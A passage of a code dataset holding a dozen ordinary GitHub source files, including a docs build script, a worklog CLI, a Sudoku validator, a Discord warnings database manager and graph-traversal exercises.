run_harmony:\n harmony_model = harmony.HarmonyModel(song_objs, model_settings)\n harmony_model.train_harmony()\n\n if run_duration:\n duration_model = duration.DurationModel(song_objs, model_settings)\n duration_model.train_duration()\n\n\nif __name__ == \"__main__\":\n settings = {\"instrument\": \"piano\", \"time_signature\": \"4/4\", \"epochs\": 5000}\n song_objs = song.get_songs(\"piano\", time_signature=\"4/4\", key=None, limit=10)\n train_model(song_objs, run_sequence=True)\n","repo_name":"jacquelinegarrahan/Olympia","sub_path":"olympia/scripts/train_all.py","file_name":"train_all.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"50"} +{"seq_id":"8306879891","text":"#!/usr/bin/env python\n\n\"\"\"\nBuild documentation by compiling README.md, .md, and .rst.\n\nNote:\n This script should NOT be run from source directory, use its link in root directory of this repository\n to build the documentation.\n\"\"\"\n\nimport os\nimport glob\nimport shutil\nimport cmder\n\nCWD = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'doc')\nSOURCE = os.path.join(CWD, 'source')\nCACHE = os.path.join(SOURCE, '.cache')\nPROJECT = os.path.join(SOURCE, 'notes')\nos.makedirs(CACHE, exist_ok=True)\n\n\ndef update_doc():\n \"\"\"\n Update top level doc by replacing placeholder __TOC__ with .md and .rst files list.\n \n :return: a list of top level docs.\n \"\"\"\n \n folders, toc = os.listdir(PROJECT), []\n for folder in folders:\n source = os.path.join(PROJECT, folder, 'README.md')\n target = os.path.join(CACHE, folder, f'{folder}.md')\n if os.path.exists(source):\n os.makedirs(os.path.join(CACHE, folder), exist_ok=True)\n toc.append(os.path.join(os.path.basename(CACHE), folder, f'{folder}.md'))\n # os.chdir(PROJECT)\n # files = [file for file in glob.iglob(os.path.join(folder, '*.md')) if not file.endswith('README.md')]\n # files += glob.glob(os.path.join(folder, '*.rst'))\n\n os.chdir(os.path.join(PROJECT, folder))\n files = [file for file in glob.iglob('*.md') if not file.endswith('README.md')]\n files += glob.glob('*.rst')\n \n for file in files:\n shutil.copy(file, os.path.join(CACHE, folder, file))\n\n with open(source) as f, open(target, 'w') as o:\n o.write(f.read().replace('__TOC__', '\\n'.join(files)))\n return toc\n\n\ndef update_master_doc(toc):\n \"\"\"\n Update master doc by replacing placeholder __TOC__ with top level doc list.\n \n :param toc: list, a list of top level docs.\n :return:\n \"\"\"\n \n with open(os.path.join(SOURCE, '.index.template.md')) as f, open(os.path.join(SOURCE, 'index.md'), 'w') as o:\n o.write(f.read().replace('__TOC__', '\\n'.join(sorted(toc))))\n\n\ndef main():\n toc = update_doc()\n update_master_doc(toc)\n cmder.run('rm -r build/html/*', msg='Deleting old build ...', cwd=CWD)\n cmder.run('make html', cwd=CWD, debug=True, msg='Building new docs ...')\n cmder.run('rm -r source/.cache', cwd=CWD, log_cmd=False)\n \n\nif __name__ == '__main__':\n main()\n","repo_name":"iBiology/iNotes","sub_path":"doc/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"29863442488","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport time\nimport datetime\nimport locale\nimport sys\nimport pathlib\n\nif (sys.argv[1] != \"stop\") and (sys.argv[1] != \"start\" or len(sys.argv) != 4): \n raise Exception('usage: wl start category activity | wl stop')\n\nlocale.setlocale(locale.LC_ALL, 'en_US.utf8')\ndateformat = \"%a %Y-%m-%d %H:%M:%S\"\n\nlogDir = str(pathlib.Path.home()) + \"/.worklog/\"\nlogPath = logDir + \"log.csv\"\nsubprocess.run(\"mkdir -p \" + logDir, shell=True)\nsubprocess.run(\"touch \" + logPath, shell=True)\n\ncurrentTime = datetime.datetime.today()\ncurrentTimeStr = currentTime.strftime(dateformat)\n\nwith open(logPath, 'r+') as logFile:\n lines = logFile.read().splitlines()\n if len(lines) > 0:\n lastLine = lines[-1]\n if lastLine.endswith(\";\"):\n startTime = datetime.datetime.strptime(lastLine.split(\";\")[0], dateformat)\n diffTime = currentTime - startTime\n logFile.write(currentTimeStr + \";\" + str(diffTime) + \"\\n\")\n else:\n print(\"Log file is empty\")\n\n if sys.argv[1] == \"start\":\n toLog = currentTimeStr + \";\" + sys.argv[2] + \";\" + sys.argv[3] + \";\"\n logFile.write(toLog)\n print(\"Writing to log: \" + toLog)\n \nprint(\"\\nTail of log fail\")\nsubprocess.run(\"tail \" + logPath, shell=True)\nprint(\"\\n\")\n","repo_name":"sikor/poligon","sub_path":"wl.py","file_name":"wl.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"40481429197","text":"import random\nclass Tank:\n def __init__(self, name, armor, min_damage, max_damage, hp,):\n self.name = name\n self.armor = armor\n self.min_damage = min_damage\n self.max_damage = max_damage\n self.hp = hp\n\n def run(self):\n print(self.name + \" выдвигается\")\n\n def loosehealth(self, damage):\n if self.hp <= 0:\n print(\"{} defeated\".format(self.name))\n else:\n self.hp = self.hp - damage\n print(\"у {} осталось {} HP\".format(self.name, self.hp))\n\n def fire(self, enemy):\n damage = random.randint(self.min_damage, self.max_damage)\n print(\"{} стреляет по {}\".format(self.name, enemy.name))\n enemy.loosehealth(damage)\n\n def __str__(self):\n\n return \"{} имеет броню в {}, урон {}-{}, и {} очков жизни\".format(self.name, self.armor, self.min_damage, self.max_damage, self.hp)\n\nif __name__ == \"__main__\":\n\n tank1 = Tank(\"Hellcat\", 100, 15, 60, 300)\n tank2 = Tank(\"Panther\", 80, 20, 70, 270)\n\n\n tank1.fire(tank2)\n\n for bullet in range(20):\n tank1.fire(tank2)","repo_name":"Artur-808/maximumlessons","sub_path":"lesson_6/lesson6.py","file_name":"lesson6.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"42290567179","text":"\"\"\"\nExponential Moving Average\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport logging\n\nfrom max.covar.covar import Covar\nimport max.covar.util as util\n\nlogger = logging.getLogger(__name__)\n\n\nclass EMA(Covar):\n\n def __init__(self, df, window):\n logger.info('Initializing EMA class')\n super(EMA, self).__init__(df, window)\n self.name = 'EMA'\n self.parameter = {'alpha_cor': np.nan, 'alpha_vol': np.nan}\n self.parameter_candidate = {'alpha_cor': np.array([]), 'alpha_vol': np.array([])}\n self.result = {'value': np.nan}\n self.result_candidate = pd.DataFrame()\n self.estimate = {'cor': np.array([]), 'vol': np.array([]), 'cov': np.array([])}\n\n def cal_estimate(self, parameter):\n self._check_parameter(parameter)\n alpha_cor = parameter['alpha_cor']\n alpha_vol = parameter['alpha_vol']\n logger.debug('Computing EMA covariance, alpha_cor = %.3f, alpha_vol = %.3f', alpha_cor, alpha_vol)\n cor_ema = self.ex_post['cor'].copy()\n vol_ema = self.ex_post['vol'].copy()\n n_dates, n_stocks = self.n_dates, self.n_stocks\n cov_ema = np.repeat(np.nan, n_dates*n_stocks*n_stocks).reshape(n_dates, n_stocks, n_stocks)\n cov_ema[self.window - 1, :, :] = util.nan_cov(cor_ema[self.window - 1, :, :], vol_ema[self.window - 1, :])\n for i in range(self.window, n_dates):\n cor_ema[i, :, :] = util.nan_ema(cor_ema[i-1, :, :], self.ex_post['cor'][i, :, :], alpha_cor)\n vol_ema[i, :] = util.nan_ema(vol_ema[i-1, :], self.ex_post['vol'][i, :], alpha_vol)\n cov_ema[i, :, :] = util.nan_cov(cor_ema[i, :, :], vol_ema[i, :])\n return {'cor': cor_ema, 'vol': vol_ema, 'cov': cov_ema}\n","repo_name":"wazai/max","sub_path":"max/covar/ema.py","file_name":"ema.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"22034773030","text":"from datetime import datetime as Datetime\nimport csv\nimport os\nimport io\nfrom flask import render_template, request\nfrom chellow.models import (\n VoltageLevel, Participant, Party, MarketRole, Llfc, Mtc, MeterType)\nfrom chellow.utils import hh_format, send_response\nimport pytz\nfrom werkzeug.exceptions import BadRequest\nfrom sqlalchemy.orm import joinedload\n\n\ndef to_iso(dmy):\n if len(dmy) == 0:\n return ''\n else:\n return '-'.join([dmy[6:], dmy[3:5], dmy[:2]]) + ' 00:00'\n\n\ndef is_common_mtc(code):\n return 499 < code < 510 or 799 < code < 1000\n\n\ndef do_get(sess):\n return render_template('report_163.html')\n\n\ndef content(table, version, f, sess):\n reader = iter(csv.reader(f))\n next(reader)\n if table == 'Line_Loss_Factor_Class':\n LLFC_MAP = dict(\n ((llfc.dno.participant.code, llfc.code), llfc) for\n llfc in sess.query(Llfc).join(Party).options(\n joinedload(Llfc.dno).joinedload('participant')))\n VOLTAGE_LEVEL_CODES = set(\n [v.code for v in sess.query(VoltageLevel)])\n DNO_MAP = dict(\n (dno.participant.code, dno) for dno in sess.query(Party).\n join(MarketRole).filter(MarketRole.code == 'R').options(\n joinedload(Party.participant)))\n for i, values in enumerate(reader):\n participant_code = values[0]\n # market_role_code = values[1]\n from_date_mpr = values[2]\n llfc_code_raw = values[3]\n # from_date_settlement = values[4]\n llfc_description = values[5]\n class_indicator = values[6]\n to_date_settlement = values[7]\n\n llfc_code = llfc_code_raw.zfill(3)\n llfc = LLFC_MAP.get((participant_code, llfc_code))\n\n if llfc is None:\n try:\n dno = DNO_MAP[participant_code]\n except KeyError:\n yield ''.join(\n \"# There is no DNO with participant code \",\n participant_code, \".\\n\")\n continue\n\n voltage_level_code = 'LV'\n llfc_description_upper = llfc_description.upper()\n for vl_code in VOLTAGE_LEVEL_CODES:\n if vl_code in llfc_description_upper:\n voltage_level_code = vl_code\n break\n\n is_substation = any(\n p in llfc_description for p in [\n '_SS', ' SS', ' S/S', '(S/S)', 'sub', 'Sub'])\n\n is_import = not any(\n p in class_indicator for p in ['C', 'D'])\n\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'insert', 'llfc', dno.dno_code, llfc_code,\n llfc_description, voltage_level_code,\n is_substation, is_import,\n to_iso(from_date_mpr),\n to_iso(to_date_settlement)))) + \"\\n\"\n elif table == 'Market_Participant':\n for i, values in enumerate(reader):\n participant_code = values[0]\n participant_name = values[1]\n\n participant = sess.query(Participant).filter(\n Participant.code == participant_code).first()\n\n if participant is None:\n\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'insert', 'participant', participant_code,\n participant_name))) + \"\\n\"\n elif participant_name != participant.name:\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'update', 'participant', participant_code,\n participant_name))) + \"\\n\"\n elif table == 'Market_Role':\n for i, values in enumerate(reader):\n role_code = values[0]\n role_description = values[1]\n\n role = sess.query(MarketRole).filter(\n MarketRole.code == role_code).first()\n\n if role is None:\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'insert', 'market_role', role_code,\n role_description))) + \"\\n\"\n elif role_description != role.description:\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'update', 'market_role', role_code,\n role_description))) + \"\\n\"\n elif table == 'Market_Participant_Role':\n for i, values in enumerate(reader):\n participant_code = values[0]\n market_role_code = values[1]\n party = sess.query(Party).join(Participant). \\\n join(MarketRole).filter(\n Participant.code == participant_code,\n MarketRole.code == market_role_code).first()\n valid_from_str = values[2]\n valid_from = Datetime.strptime(valid_from_str, \"%d/%m/%Y\")\n valid_to_str = values[3]\n if valid_to_str == '':\n valid_to = None\n else:\n valid_to = Datetime.strptime(valid_to_str, \"%d/%m/%Y\")\n name = values[4]\n dno_code_str = values[14]\n if len(dno_code_str) == 0:\n dno_code = None\n else:\n dno_code = dno_code_str\n\n if party is None:\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'insert', 'party', market_role_code,\n participant_code, name,\n hh_format(valid_from),\n '' if valid_to is None else\n hh_format(valid_to), dno_code_str))) + \"\\n\"\n elif name != party.name or dno_code != party.dno_code:\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'update', 'party', market_role_code,\n participant_code, name,\n hh_format(valid_from),\n '' if valid_to is None else\n hh_format(valid_to), dno_code_str))) + \"\\n\"\n elif table == 'Meter_Timeswitch_Class':\n for i, values in enumerate(reader):\n code_str = values[0]\n code_int = int(code_str)\n if is_common_mtc(code_int):\n code = code_str.zfill(3)\n valid_from_str = values[1]\n valid_from = Datetime.strptime(\n valid_from_str, \"%d/%m/%Y\").replace(tzinfo=pytz.utc)\n valid_from_out = hh_format(valid_from)\n valid_to_str = values[2]\n if valid_to_str == '':\n valid_to = None\n valid_to_out = ''\n else:\n valid_to = Datetime.strptime(\n valid_to_str, \"%d/%m/%Y\").replace(tzinfo=pytz.utc)\n valid_to_out = hh_format(valid_to)\n description = values[3]\n # common_code_indicator = values[4]\n has_related_metering_str = values[5]\n has_related_metering = has_related_metering_str == 'T'\n meter_type_code = values[6]\n meter_payment_type_code = values[7]\n has_comms_str = values[8]\n has_comms = has_comms_str == 'T'\n is_hh_str = values[9]\n is_hh = is_hh_str == 'H'\n tpr_count_str = values[10]\n if tpr_count_str == '':\n tpr_count = 0\n else:\n tpr_count = int(tpr_count_str)\n\n mtc = Mtc.find_by_code(sess, None, code)\n if mtc is None:\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'insert', 'mtc', '', code,\n description, has_related_metering,\n has_comms, is_hh, meter_type_code,\n meter_payment_type_code, tpr_count,\n valid_from_out, valid_to_out))) + \"\\n\"\n elif (\n description, has_related_metering, has_comms,\n is_hh, meter_type_code,\n meter_payment_type_code, tpr_count, valid_from,\n valid_to) != (\n mtc.description, mtc.has_related_metering,\n mtc.has_comms, mtc.is_hh, mtc.meter_type.code,\n mtc.meter_payment_type.code, mtc.tpr_count,\n mtc.valid_from, mtc.valid_to):\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'update', 'mtc', '', code,\n description, has_related_metering,\n has_comms, is_hh, meter_type_code,\n meter_payment_type_code, tpr_count,\n valid_from_out, valid_to_out))) + \"\\n\"\n elif table == 'MTC_in_PES_Area':\n dnos = dict(\n (p.participant.code, (p.id, p.dno_code)) for p in sess.query(\n Party).join(Participant).join(MarketRole).filter(\n MarketRole.code == 'R').options(\n joinedload(Party.participant)))\n mtcs = dict(\n ((m.dno_id, m.code), m) for m in sess.query(Mtc).options(\n joinedload(Mtc.meter_type),\n joinedload(Mtc.meter_payment_type)).all())\n for i, values in enumerate(reader):\n code_str = values[0]\n code_int = int(code_str)\n if not is_common_mtc(code_int):\n code = code_str.zfill(3)\n participant_code = values[2]\n dno_id, dno_code = dnos[participant_code]\n valid_from_str = values[3]\n valid_from = Datetime.strptime(\n valid_from_str, \"%d/%m/%Y\").replace(tzinfo=pytz.utc)\n valid_from_out = hh_format(valid_from)\n valid_to_str = values[4]\n if valid_to_str == '':\n valid_to = None\n valid_to_out = ''\n else:\n valid_to = Datetime.strptime(\n valid_to_str, \"%d/%m/%Y\").replace(tzinfo=pytz.utc)\n valid_to_out = hh_format(valid_to)\n description = values[5]\n meter_type_code = values[6]\n meter_payment_type_code = values[7]\n has_related_metering = code_int > 500\n has_comms = values[8] == 'Y'\n is_hh = values[9] == 'H'\n tpr_count_str = values[10]\n if tpr_count_str == '':\n tpr_count = 0\n else:\n tpr_count = int(tpr_count_str)\n\n mtc_dno_id = dno_id if Mtc.has_dno(code) else None\n mtc = mtcs.get((mtc_dno_id, code))\n\n if mtc is None:\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'insert', 'mtc', dno_code, code,\n description, has_related_metering,\n has_comms, is_hh, meter_type_code,\n meter_payment_type_code, tpr_count,\n valid_from_out, valid_to_out))) + \"\\n\"\n elif (\n description, has_related_metering, has_comms,\n is_hh, meter_type_code, meter_payment_type_code,\n tpr_count, valid_from, valid_to) != (\n mtc.description, mtc.has_related_metering,\n mtc.has_comms, mtc.is_hh, mtc.meter_type.code,\n mtc.meter_payment_type.code, mtc.tpr_count,\n mtc.valid_from, mtc.valid_to):\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'update', 'mtc', dno_code, code,\n description, has_related_metering,\n has_comms, is_hh, meter_type_code,\n meter_payment_type_code, tpr_count,\n valid_from_out, valid_to_out))) + \"\\n\"\n elif table == 'MTC_Meter_Type':\n for i, values in enumerate(reader):\n code = values[0]\n description = values[1]\n valid_from_str = values[2]\n valid_from = Datetime.strptime(\n valid_from_str, \"%d/%m/%Y\").replace(tzinfo=pytz.utc)\n valid_from_out = hh_format(valid_from)\n valid_to_str = values[3]\n if valid_to_str == '':\n valid_to = None\n valid_to_out = ''\n else:\n valid_to = Datetime.strptime(\n valid_to_str, \"%d/%m/%Y\").replace(tzinfo=pytz.utc)\n valid_to_out = hh_format(valid_to)\n pt = sess.query(MeterType).filter(\n MeterType.code == code).first()\n if pt is None:\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'insert', 'meter_type', code, description,\n valid_from_out, valid_to_out))) + \"\\n\"\n\n elif (description, valid_from, valid_to) != (\n pt.description, pt.valid_from, pt.valid_to):\n yield ','.join(\n (\n '\"' + str(v) + '\"' for v in (\n 'update', 'meter_type', code, description,\n valid_from_out, valid_to_out))) + \"\\n\"\n else:\n raise Exception(\"The table \" + table + \" is not recognized.\")\n\n\ndef do_post(sess):\n file_item = request.files[\"file\"]\n file_path = file_item.filename\n file_head, file_name = os.path.split(file_path)\n file_title, file_ext = os.path.splitext(file_name)\n if not file_ext == '.csv':\n raise BadRequest(\n \"The file name should have the extension .csv, but in fact it \"\n \"has the extension '\" + file_ext + \"'.\")\n idx = file_title.rfind('_')\n table = file_title[:idx]\n version = file_title[idx+1:]\n f = io.StringIO(str(file_item.read(), 'utf8'))\n f.seek(0)\n return send_response(\n content, args=(table, version, f, sess),\n file_name=table + '_' + version + '_general_import.csv')\n","repo_name":"JuviAndaya/chellow","sub_path":"chellow/reports/report_163.py","file_name":"report_163.py","file_ext":"py","file_size_in_byte":15066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"50"} +{"seq_id":"9478415318","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 24 11:37:53 2019\n\n@author: pearp\n\"\"\"\nfrom mpl_toolkits.mplot3d import Axes3D\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n## user inputs\ntheta_x_deg = 1\ntheta_y_deg = 1\ntheta_z_deg = 0\n##\n\ndef c(theta):\n return np.cos(theta)\n\ndef s(theta):\n return np.sin(theta)\n\ndef rotation_x(theta):\n R = np.array([[1, 0, 0], [0, c(theta), -s(theta)], [0, s(theta), c(theta)]])\n return R\n\ndef rotation_y(theta):\n R = np.array([[c(theta), 0, s(theta)], [0, 1, 0], [-s(theta), 0, c(theta)]])\n return R\n\ndef rotation_z(theta):\n R = np.array([[c(theta), -s(theta), 0], [s(theta), c(theta), 0], [0, 0, 1]])\n return R\n\n## Start of code\n\nA = np.array([15, 5, 130]) # offset from stage rotation centre to desired rotation centre\nprint(\"Rotation centre offset is:\")\nprint(\"x = \" + str(A[0]) + \"mm\")\nprint(\"y = \" + str(A[1]) + \"mm\")\nprint(\"z = \" + str(A[2]) + \"mm\")\n\nprint(\"For an rotation angle of \")\nprint(str(theta_x_deg) + \" degree about the x-axis,\")\nprint(str(theta_y_deg) + \" degree about the y-axis, and\")\nprint(str(theta_z_deg) + \" degree about the z-axis:\")\n\n# Calculate elements of rotation matrices\nR_x = rotation_x(np.deg2rad(theta_x_deg))\n\nR_y = rotation_y(np.deg2rad(theta_y_deg))\n\nR_z = rotation_z(np.deg2rad(theta_z_deg))\n\nR = np.matmul(R_y, R_z)\nR = np.matmul(R_x, R)\n\n# Apply rotation matrix R to point A\nB = np.matmul(R, A) # location of desired rotation centre after stage rotation\n\nT_ab = B - A \nT_ba = -T_ab # desired post-rotation translation to move rotation centre back to axis\n\nprint(\"Requires stage translation of:\")\nprint(\"x = {0:.3f}mm\".format(T_ba[0]))\nprint(\"y = {0:.3f}mm\".format(T_ba[1]))\nprint(\"z = {0:.3f}mm\".format(T_ba[2]))","repo_name":"philearp/ufr-development-repo","sub_path":"stage-movement/StageRotationCorrectionDevelop.py","file_name":"StageRotationCorrectionDevelop.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"74541151836","text":"\"\"\"\nAuthor: Charles Liu\n\nProgram: Intro to Cloud Computing Assignment 3; Bulk Uploading to ElasticSearch python code\n\nDate: 6/29/2022\n\n\"\"\"\nfrom variables import *\nimport pandas as pd\nfrom requests_aws4auth import AWS4Auth\nimport boto3\nimport requests\nimport openpyxl\nimport csv\nimport string\n\n\nf = open('ES.csv')\n\ndata = csv.reader(f)\n\nidx = 0\n\nchar_to_remove = '[]\"'\n\nhost = ES_URL\npath = 'posts/_doc/'\nregion = 'us-east-1'\nservice = 'es'\n#credentials = boto3.Session().get_credentials()\n#awsauth = AWS4Auth(region, service, session_token=credentials.token)\n\n\ndef clean_string(str):\n new_str = \"\"\n if str != '[\"\"]':\n for char in str:\n if (not char in char_to_remove):\n new_str += char\n else:\n new_str = str\n return new_str\n\n\nnext(data)\n\nfor i in data:\n id = int(i[0])\n tags = []\n for index in range(1,len(i)):\n add_str = clean_string(i[index])\n tags.append(add_str)\n print (\"#:\", idx, \" id:\", id, \" tags:\", tags, \"\\n\")\n payload = {\"id\": id, \"tags\": tags}\n url = host+path+str(idx+1)+'/'\n r = requests.post(url, auth=(USER, PASS), json = payload)\n print(r.text, \"\\n\")\n idx += 1\n if idx == 1200:\n break\n\n\n\nf.close()\n\n\n\n\n\n\n\n\n","repo_name":"Chliu81/Intro-to-Cloud-Computing","sub_path":"assignments/assignment-3/ES/BulkUploadES.py","file_name":"BulkUploadES.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"15995841467","text":"class Solution:\n def validRow(self, start, grid):\n seen = set()\n for k in range(9):\n number = grid[start + k]\n if number != \".\":\n if number in seen:\n return False\n seen.add(number)\n return True\n\n def validColumn(self, start, grid):\n seen = set()\n for k in range(9):\n number = grid[start + 9 * k]\n if number != \".\":\n if number in seen:\n return False\n seen.add(number)\n return True\n\n def validSquare(self, start, grid):\n seen = set()\n list_number = []\n for k in range(3):\n list_number.append(grid[start + k])\n list_number.append(grid[start + 9 + k])\n list_number.append(grid[start + 18 + k])\n for number in list_number:\n if number != \".\":\n if number in seen:\n return False\n seen.add(number)\n return True\n\n def isValidSudoku(self, board: List[List[str]]) -> bool:\n grid = []\n for l in board:\n grid += l\n for k in range(9):\n if not self.validColumn(k, grid) or not self.validRow(k * 9, grid):\n return False\n for i in range(3):\n for j in range(3):\n if not self.validSquare(i * 3 + j * 27, grid):\n return False\n return True\n","repo_name":"INSAlgo/trainings-2019","sub_path":"MC_2019_11 /15_Valid_Sudoku.py","file_name":"15_Valid_Sudoku.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"9308945324","text":"from datetime import datetime, timedelta\nfrom bson.objectid import ObjectId, InvalidId\nfrom pymongo import DESCENDING\n\n\nclass WarningsManager:\n def __init__(self, db):\n self.collection = db['warnings_v2']\n\n def add_warning(self, warning):\n warning_data = warning.to_dict()\n result = self.collection.insert_one(warning_data)\n warning._id = result.inserted_id # Update _id of the Warning object\n\n def get_warnings(self, user_id, server_id):\n query = {\"user_id\": str(user_id), \"server_id\": str(server_id)}\n results = self.collection.find(query).sort(\"created_at\", DESCENDING)\n return [Warning.from_dict(data) for data in results]\n\n def try_delete_warning(self, warning_id, server_id):\n try:\n warning_id = ObjectId(warning_id)\n except (InvalidId, TypeError):\n return f\"Invalid warning id: `{warning_id}`\"\n\n found_warning = self.collection.find_one({\"_id\": warning_id, \"server_id\": str(server_id)})\n\n if found_warning is None:\n return f\"Warning with id `{warning_id}` not found.\"\n else:\n self.collection.delete_one({\"_id\": warning_id})\n return f\"Deleted warning with id `{warning_id}` for user {found_warning.user_name}\"\n\n def try_get_warning(self, warning_id, server_id):\n try:\n warning_id = ObjectId(warning_id)\n except (InvalidId, TypeError):\n return None\n\n return self.collection.find_one({\"_id\": warning_id, \"server_id\": str(server_id)})\n\n def delete_warning(self, warning):\n self.collection.delete_one({\"_id\": warning._id})\n\n def get_ttl(self): # ttl = time to live\n \"\"\"\n Retrieves the Time To Live (ttl) value in SECONDS.\n \"\"\"\n default = timedelta(days=90) # the default expiration time, DO NOT change it\n\n indexes = self.collection.list_indexes()\n for index in indexes:\n if 'expireAfterSeconds' in index:\n return index['expireAfterSeconds']\n return default\n\n\nclass Warning:\n def __init__(self, user_id, user_name, level, reason, mod_id, mod_name, server_id, server_name, created_at: datetime):\n self._id = None # Initialize _id as None by default\n self.user_id = str(user_id)\n self.user_name = str(user_name)\n self.level = int(level)\n self.reason = str(reason)\n self.mod_id = str(mod_id)\n self.mod_name = str(mod_name)\n self.server_id = str(server_id)\n self.server_name = str(server_name)\n self.created_at: datetime = created_at\n\n def to_dict(self):\n data = {\n \"user_id\": self.user_id,\n \"user_name\": self.user_name,\n \"level\": self.level,\n \"reason\": self.reason,\n \"mod_id\": self.mod_id,\n \"mod_name\": self.mod_name,\n \"server_id\": self.server_id,\n \"server_name\": self.server_name,\n \"created_at\": self.created_at\n }\n if self._id:\n data[\"_id\"] = self._id\n return data\n\n @classmethod\n def from_dict(cls, data):\n warning = cls(\n data[\"user_id\"],\n data[\"user_name\"],\n data[\"level\"],\n data[\"reason\"],\n data[\"mod_id\"],\n data[\"mod_name\"],\n data[\"server_id\"],\n data[\"server_name\"],\n data[\"created_at\"]\n )\n warning._id = data.get(\"_id\") # Set _id if present in the data\n return warning\n\nclass WarnLevel:\n def __init__(self, emoji, color, name):\n self.emoji = emoji\n self.color = color\n self.name = name\n\nwarn_levels = {\n 0: WarnLevel(\"🔵\", 0x55ACEE, \"Verbal\"),\n 1: WarnLevel(\"🟢\", 0x78B159, \"Normal\"),\n 3: WarnLevel(\"🟡\", 0xFDCB58, \"Medium\"),\n 5: WarnLevel(\"🟠\", 0xF4900C, \"Big\"),\n 7: WarnLevel(\"🔴\", 0xDD2E44, \"Huge\"),\n 10: WarnLevel(\"âš«\", 0x000000, \"nil\")\n}","repo_name":"s00240122/Python-tings","sub_path":"Maiq bot/db/warnings_manager.py","file_name":"warnings_manager.py","file_ext":"py","file_size_in_byte":3939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"74541437916","text":"from collections import deque\n\n# n : 정점의 개수, m : 간선의 개수, v : 탐색을 시작할 정점의 번호\nn, m, v = map(int, input().split())\ngraph = [[] for _ in range(n + 1)] # 0 ~ n까지의 2차원 리스트(빈 리스트) 생성, index 0은 사용 X\n\nfor _ in range(m):\n a, b = map(int, input().split())\n graph[a].append(b)\n graph[b].append(a) # 단방향이 아니므로 양쪽 인덱스에 모두 대입\n\nfor i in range(n + 1):\n graph[i].sort() # 정점 번호가 작은 것을 먼저 방문하기 위한 오름차순 정렬\n\nvisited_dfs = [False] * (n + 1)\nvisited_bfs = [False] * (n + 1)\n\ndef dfs(graph, v, visited_dfs):\n visited_dfs[v] = True # 현재 노드를 방문처리\n print(v, end=' ')\n\n # 현재 노드와 연결된 다른 노드를 재귀적으로 방문\n for i in graph[v]:\n if not visited_dfs[i]:\n dfs(graph, i, visited_dfs)\n\ndef bfs(graph, v, visited_bfs):\n q = deque([v])\n visited_bfs[v] = True # 현재 노드를 방문처리\n \n while q: # queue가 빌 때까지 수행\n # queue에서 하나의 원소를 뽑아 출력\n x = q.popleft()\n print(x, end=' ')\n \n # 아직 방문하지 않은 인접한 원소들을 큐에 삽입\n for i in graph[x]:\n if not visited_bfs[i]:\n q.append(i)\n visited_bfs[i] = True\n\ndfs(graph, v, visited_dfs)\nprint() # 줄바꿈\nbfs(graph, v, visited_bfs)\n","repo_name":"chlgksdbs/Baekjoon-Online-Judge","sub_path":"Python/단계별로 풀어보기/27. 그래프와 순회/[1260] DFS와 BFS.py","file_name":"[1260] DFS와 BFS.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"9737115231","text":"import argparse\nimport sys\nfrom pathlib import Path\nimport os\nSPIKECOUNTER_PATH = os.getenv(\"SPIKECOUNTER_PATH\")\nsys.path.append(SPIKECOUNTER_PATH)\n\nimport argparse\nfrom spikecounter.analysis import images\nfrom spikecounter import utils\nimport logging\nimport skimage.io as skio\nimport pandas as pd\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"expt_info_path\")\nparser.add_argument(\"data_folder\")\nparser.add_argument(\"roi_path\")\nparser.add_argument(\"--expt_index\", default=\"None\", type=str)\nparser.add_argument(\"--block_size\", default=375, type=int)\nparser.add_argument(\"--offset\", default=0.05, type=float)\nparser.add_argument(\"--output_data_dir\", default=\"None\", type=str)\n\n\n\nargs = parser.parse_args()\n\noutput_data_dir = args.output_data_dir\n\nif output_data_dir == \"None\":\n output_data_dir = args.data_folder\n \noutput_root = os.path.join(output_data_dir, \"analysis\", \"individual_fish_recordings\")\nos.makedirs(output_root, exist_ok=True)\nlogging.basicConfig(filename=os.path.join(output_root, \"debug.log\"), level=logging.DEBUG, encoding=\"utf-8\", filemode=\"w\")\n\nexpt_info = pd.read_csv(args.expt_info_path).sort_values(\"start_time\")\nroi_mask = skio.imread(args.roi_path)\n\n\nif args.expt_index == \"None\":\n 